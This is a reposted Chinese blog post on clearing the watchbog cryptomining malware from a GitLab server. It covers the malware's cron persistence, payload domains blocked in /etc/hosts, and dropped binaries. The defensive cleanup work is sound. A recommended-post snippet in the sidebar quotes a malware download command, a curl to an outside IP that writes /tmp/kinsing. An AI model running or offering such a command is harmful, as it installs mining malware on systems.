阿里云挖矿病毒查杀二

最新推荐文章于 2024-04-01 17:15:28 发布

weixin_30518397

最新推荐文章于 2024-04-01 17:15:28 发布

阅读量240

点赞数

文章标签：开发工具

原文链接：http://www.cnblogs.com/panpan61803/p/11506549.html

版权

今天gitlib服务变得很慢，提交代码甚至失败，排除了下网络，最后登上机器

登录特别慢，此时想到肯定是中毒了。top看了下。果不其然【watchbog】cpu占用160%

随手杀了，几秒后又启动了。还是先查启动脚本吧

crontab -l 了下果然有一个定时任务

crontab -r 去掉了，再kill 掉进程

几秒后又变卡了。意识到还有其他启动，得深入查下了

下载脚本下载的文件，是个base64加密串，解密后提取出ip

ptpb.pw
pastebin.com
gitee.com
aziplcr72qjhzvin.onion.to

我们都给指定解析到本地

vim /etc/hosts

添加一行

　　127.0.0.1 ptpb.pw pastebin.com gitee.com aziplcr72qjhzvin.onion.to

然后我再一个一个检查这几个定时任务

/etc/cron.d
/etc/cron.deny
/etc/cron.monthly
/etc/cron.daily
/etc/cron.hourly
/etc/crontab
/etc/cron.weekly

删除掉新增的

最后还发现在新增了命令/bin/httpntp、/bin/ftpsdns

查看对应命令文件，也是下载启动这个病毒的

删掉 /bin/httpntp、/bin/ftpsdns、/bin/watchbog

最后再kill 掉进程，观察一会，此时世界安静

转载于:https://www.cnblogs.com/panpan61803/p/11506549.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30518397

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

Linux挖矿病毒清理流程

ouxx2009的专栏

03-14

1万+

Linux挖矿病毒清理流程 1.前言：根据阿里云快讯病毒公布： Redis RCE导致h2Miner蠕虫病毒，其利用Redis未授权或弱口令作为入口，使用主从同步的方式从恶意服务器上同步恶意module，之后在目标机器上加载此恶意module并执行恶意指令。在以往常见的攻击者或蠕虫中，其大多都沿用登陆redis后写入定时任务或写ssh key的方式进行入侵，这种方式受权限与系统类型影响并不一定能够成功。而此次使用redis加载module的攻击方式，可以直接执行任意指令或拿到shell交互环境，危害

最新挖矿病毒xmrig清除方法和原理

m0_73140589的博客

03-21

3708

手机端接收短信提醒，服务器正遭受挖矿病毒攻击，服务器的cpu和内存占用高，阿里云不断告警

参与评论您还未登录，请先登录后发表或查看评论

阿里云挖矿病毒解决

weixin_39766667的博客

02-20

2396

有一次，我们在阿里上的服务器收到这样的短信。【阿里云】尊敬的xxxxxx:经检测您的阿里云服务（ECS实例）xxxxxxxx存在挖矿活动。根据相关法规、政策的规定及监管部门的要求，请您于2023-02-27 00时前完成挖矿问题整改，否则您的服务将被关停，详情请查看邮件或阿里云站内消息通知。若您有其他问题，可登陆阿里云官网在线咨询这就是中了挖矿病毒，如何处理它？

LifeCalendar

12-18

采用jsp，Java技术编写的一个人生日历，可当日记本、相册、计划簿使用

很好用的蠕虫病毒查杀工具

10-30

很好用的蠕虫病毒查杀工具

挖矿蠕虫肆虐，详解云防火墙如何轻松“制敌”

weixin_34023863的博客

05-09

298

根据阿里云安全团队发布的《2018年云上挖矿分析报告》显示，过去一年中，每一波热门0 Day的出现都伴随着挖矿蠕虫的爆发性传播，挖矿蠕虫可能因为占用系统资源导致业务中断，甚至还有部分挖矿蠕虫同时会捆绑勒索病毒(如XBash等)给企业带来资金与数据的损失。如何提升企业的安全水位，抵御挖矿蠕虫的威胁成为每个企业都在思考的问题。本文以云上环境为例，从挖矿蠕虫的防御、检测和入侵后如何迅速止血三方面来阐述阿...

Linux下清除挖矿病毒kswapd0

最新发布

zc20081111的博客

04-01

1039

文件路径/proc/11389/root/var/jenkins_home/workspace/UpdateJenkins/trace。容器视角文件路径/var/jenkins_home/workspace/UpdateJenkins/trace。再次强调，一定要修改密码，强度要高，设置了类似Pass1234这类简单密码，直接GG。文件路径/root/.configrc5/a/kswapd0。容器名jenkins001 ---这个是我被黑的容器名称。服务器存在香港异地登录。虽然只是学习用的便宜机器。

centos6.8服务器中了挖矿程序病毒的解决方法

emtit2008的专栏

09-04

935

阿里云提示我的centos服务器出现紧急安全事件：挖矿程序；同时也出现服务器异常登录事件。出现这样的情况，需要根据以下的步骤去处理第一步：修改登录的帐号密码，输入命令passwd，根据提未修改。第二步：禁用可疑的IP，阿里云会有一些IP提示，先把异常登录的IP禁用；命令如下 iptables -I INPUT -s 68.183.140.39 -j DROP //禁用指定的IP ...

python挖矿木马_kworkerds 挖矿木马简单分析及清理

weixin_39952800的博客

12-06

700

公司之前的开发和测试环境是在腾讯云上，部分服务器中过一次挖矿木马 kworkerds，本文为我当时分析和清理木马的记录，希望能对大家有所帮助。现象top 命令查看，显示 CPU 占用 100%，进程名无明显规则，如：TzBeq3AM。进程有时候会被隐藏，通过分析脚本删除部分依赖文件，可以显示出来。存在可疑的 python 进程。crontab 被写入了一个定时任务，每半小时左右会从 pastebi...

资源网站推荐（自媒体，音视频，ppt，电子书）

偶尔写些东西，意思一下我也参与了内卷

01-23

5467

这是一个古籍文献在线阅读网站，资料非常全，页面排版很有特色。以前是一个比较简洁大方的站点，但是后来加了一些广告，界面比较乱，其中的资源都是免费下载，下载时需要关注网站运营者的公众号获取密码，网站资源整体质量较高。视频素材质量相当高，有大量的4K素材，如果追寻高质量的素材，这个网站会是一个不错的选择，但是上面的素材有一部分是有版权的，如果是商用的话，要注意区分。这个网站不是资源网站，但还是想这里提一下，它是一个下载音频的在线工具，和淘声网的资源相整合，所有的声音素材都可以利用它进行下载，并进行批量打包。

Watchbog挖矿病毒程序排查过程

qq_35718530的博客

04-25

2263

目录第1章情况第2章解决方案 2.1 修改/etc/hosts 2.2 防火墙控制出入流量 2.3 移除curl get脚本 2.4 删掉cron里面的相关任务 2.5 删除恶意命令 2.6 删除tmp目录下timesyncc.service文件 2.7 杀掉watchbog进程第3章总结第1章情况 1）服务器收到cpu报警，cpu被占用达到...

Linux学习小计（2）-dragoon安装

SAN_YUN的专栏

05-10

546

10.23.230.161 monitor/monitor 登录，agent在那里面 #cat /etc/redhat-release Red Hat Enterprise Linux Server release 5.3 (Tikanga) 哦，那应该就是64_RedHatEnterpriseLinuxServerrelease5.3Tikanga 6日期:2011-05-09 L...

-bash: zip: command not found提示解决办法

热门推荐

jiaguo699的专栏

06-19

4万+

-bash: zip: command not found 是因为liunx服务器上没有安装zip命令，需要安装一下即可 linux安装zip命令： apt-get install zip 或yum install zip linux安装unzip命令： apt-get install unzip 或yum install unzip ——-本目录下的所有文件（含子目录）压缩为

记一次阿里云服务器中挖矿病毒处理

kk.xie的博客

09-11

7597

1.收到阿里云发来的预警短信【阿里云】尊敬的1*********9：云盾云安全中心检测到您的服务器：1xx.xx.xx.x5（gateway）出现了紧急安全事件：主动连接恶意下载源，建议您立即登录云安全中心控制台-安全告警处理http://a.aliyun.com/f1.gYVW7 进行处理。云安全中心提供企业版7天免费试用，您可以开通试用查看更多信息。如果您在处理过程中遇到问题，可...

阿里云服务器中挖矿病毒解决办法（已实践）

qq_49182770的博客

02-13

8424

1、cpu过高，中病毒了 2、进入Linux连接阿里云服务器 3、使用top命令动态查看cpu占用率两种情况 1、未发现占用率很高的进程，跳到第七步 2、发现了占用率很高的进程，使用kill -9 pid 杀死进程会发现病毒继续出现，没用，跳到第四步 4、查看病毒文件地址输入 ls -l /proc/{病毒PID}/exe 查看病毒路径 5、进入病毒文件，将其统统删除 6、kill 杀死进程，完成，再次查看cpu，无病毒进程搞定 7、如果阿里云服务器中显示c.

【挖矿木马追踪】GuardMiner团伙

Websec

03-10

2864

原文章:https://s.tencent.com/research/report/1265.html 该挖矿木马具备较强的自动化攻击和扩散感染能力； l攻击成功后的恶意脚本会关闭linux防火墙，使系统安全性进一步下降； l会禁用或卸载多款云主机安全软件； l从比特币交易记录中动态获取C2地址； l会清除竞品挖矿木马，杀死CPU占用超过40%的进程； l依次下载挖矿程序、守护程序和攻击程序； l通过通过安装crontab任务、写入SSH authorized_key...

记一次被注入挖矿程序kdevtmpfi解决记录

但行好事，莫问前程

02-05

4901

前言发现自己服务器资源使用异常，cpu使用率100%，内存使用也很多，且有陌生的进程。那很有可能是被入侵植入了挖矿程序解决问题遇到这种问题切忌惊慌失措，一般挖矿程序除了占用服务资源不会有其他危害 1. 切断来源一般被侵入的话，服务器上的计划任务会被修改，会有一个进程一直在检测程序是否存在，如果只kill进程删除文件的话会发现过不了一会就会死灰复燃，所以斩草除根，先把去外界不安全的连接关掉。被修改的计划任务如curl -o /tmp/kinsing http://45.137.155.5.

linux挖矿病毒查杀

09-10

要查杀Linux挖矿病毒，首先需要识别病毒的特征。根据引用提供的信息，挖矿病毒在Linux系统中的一个重要特征是CPU占用率非常高。然而，为了更好地隐藏自己，一些挖矿病毒会控制CPU的占用率，使其保持在50%以下，这...